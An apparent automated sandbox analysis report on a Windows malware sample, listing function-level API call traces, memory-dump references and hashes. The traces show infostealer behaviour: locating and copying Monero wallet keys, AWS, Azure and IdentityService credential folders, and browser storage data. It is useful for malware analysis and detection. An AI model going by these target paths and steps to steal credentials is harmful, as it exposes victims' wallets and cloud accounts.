                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 19a45ca91122dc986f6c16a5b9def569e71615d85b303cff34d153fc5148882c
                            • Instruction ID: e3831171581dd4acc532b861984c20e72c6379ba726d714d14e4db1ba5919232
                            • Opcode Fuzzy Hash: 19a45ca91122dc986f6c16a5b9def569e71615d85b303cff34d153fc5148882c
                            • Instruction Fuzzy Hash: 40216AF3E2222047F3985878CD5A3AB758697C0321F2B83798F68A7AC5DC7D9D4502C4
                            Function 008F86F0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F8776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F87AD
                            • lstrcpy.KERNEL32(?,00000000), ref: 008F87EA
                            • StrStrA.SHLWAPI(?,012FF5E8), ref: 008F880F
                            • lstrcpyn.KERNEL32(00B193D0,?,00000000), ref: 008F882E
                            • lstrlen.KERNEL32(?), ref: 008F8841
                            • wsprintfA.USER32 ref: 008F8851
                            • lstrcpy.KERNEL32(?,?), ref: 008F8867
                            • StrStrA.SHLWAPI(?,012FF600), ref: 008F8894
                            • lstrcpy.KERNEL32(?,00B193D0), ref: 008F88F4
                            • StrStrA.SHLWAPI(?,012FF840), ref: 008F8921
                            • lstrcpyn.KERNEL32(00B193D0,?,00000000), ref: 008F8940
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 0044eb1dea3c2fda408eb77990af5560522f1ae122003b5a4091ba1dd2c421dc
                            • Instruction ID: 42ebc862ab9b6e30ad29d7dde54769504cded80c7be30d2298485452dccadb86
                            • Opcode Fuzzy Hash: 0044eb1dea3c2fda408eb77990af5560522f1ae122003b5a4091ba1dd2c421dc
                            • Instruction Fuzzy Hash: 77F16072900158EFCB11DB68DD58AEAB7B9FF88700F908595F919E3250DF70AE41CBA0
                            Function 008E1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E1F9F
                            • lstrlen.KERNEL32(012F92F0), ref: 008E1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 008E1FE3
                            • lstrlen.KERNEL32(0091179C), ref: 008E1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E200E
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E204D
                            • lstrlen.KERNEL32(0091179C), ref: 008E2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2075
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E2081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E20AC
                            • lstrlen.KERNEL32(?), ref: 008E20E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2104
                            • lstrcat.KERNEL32(00000000,?), ref: 008E2112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2139
                            • lstrlen.KERNEL32(0091179C), ref: 008E214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E216B
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008E2177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E21A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E21D4
                            • lstrlen.KERNEL32(?), ref: 008E21EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E220A
                            • lstrcat.KERNEL32(00000000,?), ref: 008E2218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2242
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E227F
                            • lstrlen.KERNEL32(012FDF80), ref: 008E228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E22B1
                            • lstrcat.KERNEL32(00000000,012FDF80), ref: 008E22B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E22F7
                            • lstrcat.KERNEL32(00000000), ref: 008E2304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008E2356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E2382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E23BF
                            • DeleteFileA.KERNEL32(00000000), ref: 008E23F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008E2444
                            • FindClose.KERNEL32(00000000), ref: 008E2453
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: a9fa67a670f378d8cda6cda6828020923073ee06f952107d5a529e3716e0040f
                            • Instruction ID: e46aa7963ae68d8ae8a4a1a245a19a3bfa662ef3bb4a7e2d70b460f9a4f7b72b
                            • Opcode Fuzzy Hash: a9fa67a670f378d8cda6cda6828020923073ee06f952107d5a529e3716e0040f
                            • Instruction Fuzzy Hash: AEE15E31A1129AABCB21EF6ADC89A9E77BDFF46300F444024F905E7251DF74EE418B91
                            Function 008F6570 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F65A5
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F65E0
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008F660A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6641
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F666E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: 52f1a718404b6bbd8573cf7d6d9cfac8f17d166aea1b9c6ef84f41b9cf6ef75b
                            • Instruction ID: 6f31917cb23837d5c6f6ee214dda937fe3478ef287099bcfa8d4b0312fce9875
                            • Opcode Fuzzy Hash: 52f1a718404b6bbd8573cf7d6d9cfac8f17d166aea1b9c6ef84f41b9cf6ef75b
                            • Instruction Fuzzy Hash: 6AF1E47091125AAFCB21AF79C849ABE7BB8FF05300F448228F915E7251EB74DD61CB91
                            Function 008F44D0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4503
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4536
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F455E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4569
                            • lstrlen.KERNEL32(\storage\default\), ref: 008F4574
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4591
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 008F459D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F45C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F45D1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F45F8
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4637
                            • lstrcat.KERNEL32(00000000,?), ref: 008F463F
                            • lstrlen.KERNEL32(0091179C), ref: 008F464A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4667
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F4673
                            • lstrlen.KERNEL32(.metadata-v2), ref: 008F467E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F469B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 008F46A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F46CE
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4700
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008F4707
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F4761
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F478A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F47B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F47DB
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F480F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: 974dd84b71630dded6c2531441b0b71bcf5eb007193f389ed17a32ed9c6229e4
                            • Instruction ID: ca53be624d12bd60ef91fb3d11350f0e1a24b985e43c15106191cb9c9bed6a43
                            • Opcode Fuzzy Hash: 974dd84b71630dded6c2531441b0b71bcf5eb007193f389ed17a32ed9c6229e4
                            • Instruction Fuzzy Hash: 1CB1BC31A1129AABDB21BF79DD49AAF3BA8FF05700F006025F906E7251DF74DD418B92
                            Function 008F5900 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F5935
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008F5964
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5995
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F59BD
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F59C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F59F0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5A28
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F5A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5A58
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F5A8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5AB6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F5AC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5AE8
                            • lstrlen.KERNEL32(0091179C), ref: 008F5AFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5B19
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F5B25
                            • lstrlen.KERNEL32(012FDFB0), ref: 008F5B34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5B57
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F5B62
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5B8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5BB8
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008F5BBF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5C17
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5C8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5CB6
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5CE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5D15
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F5D4F
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F5DAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F5DD0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 6f82b8c205fa0e370d849b829820b43c69f35796f267f3975f21f5d40a276ae8
                            • Instruction ID: ddaf48ee0c4790854453e04ca7c5aad7b21ad29e3e9776e9cde1f956c6f92ff5
                            • Opcode Fuzzy Hash: 6f82b8c205fa0e370d849b829820b43c69f35796f267f3975f21f5d40a276ae8
                            • Instruction Fuzzy Hash: 3802EF71A0165AAFCB21EF79D889AAE7BB9FF44310F444128FA05E3251DB70DE41CB91
                            Function 008E1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008E1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1135
                              • Part of subcall function 008E1120: RtlAllocateHeap.NTDLL(00000000), ref: 008E113C
                              • Part of subcall function 008E1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1159
                              • Part of subcall function 008E1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1173
                              • Part of subcall function 008E1120: RegCloseKey.ADVAPI32(?), ref: 008E117D
                            • lstrcat.KERNEL32(?,00000000), ref: 008E11C0
                            • lstrlen.KERNEL32(?), ref: 008E11CD
                            • lstrcat.KERNEL32(?,.keys), ref: 008E11E8
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E121F
                            • lstrlen.KERNEL32(012F92F0), ref: 008E122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1251
                            • lstrcat.KERNEL32(00000000,012F92F0), ref: 008E1259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 008E1264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 008E1294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E12BA
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E12FF
                            • lstrlen.KERNEL32(012FDF80), ref: 008E130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1335
                            • lstrcat.KERNEL32(00000000,?), ref: 008E133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1378
                            • lstrcat.KERNEL32(00000000), ref: 008E1385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E13AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008E13D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E1401
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E143D
                              • Part of subcall function 008FEFC0: lstrcpy.KERNEL32(00000000,?), ref: 008FEFF2
                            • DeleteFileA.KERNEL32(?), ref: 008E1471
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: c2db7f3ae832286f8bd32ca5a03e7a9ac7b99a7413e08df1b6f04c1083b712ac
                            • Instruction ID: fa8ddabd59c9e31d0c1c0ff232ba29ec0fa3798e3190f6ea6b242d44b17c7e87
                            • Opcode Fuzzy Hash: c2db7f3ae832286f8bd32ca5a03e7a9ac7b99a7413e08df1b6f04c1083b712ac
                            • Instruction Fuzzy Hash: 79A1AF71A00296ABCB21EB7ADC89ADE7BB9FF46700F444024F905E7241DF74DE418B91
                            Function 008FE900 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 008FE920
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008FE949
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE97F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE98D
                            • lstrcat.KERNEL32(?,\.azure\), ref: 008FE9A6
                            • memset.MSVCRT ref: 008FE9E5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008FEA0D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEA3F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEA4D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 008FEA66
                            • memset.MSVCRT ref: 008FEAA5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008FEAD1
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FEB00
                            • lstrcat.KERNEL32(?,00000000), ref: 008FEB0E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008FEB27
                            • memset.MSVCRT ref: 008FEB66
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
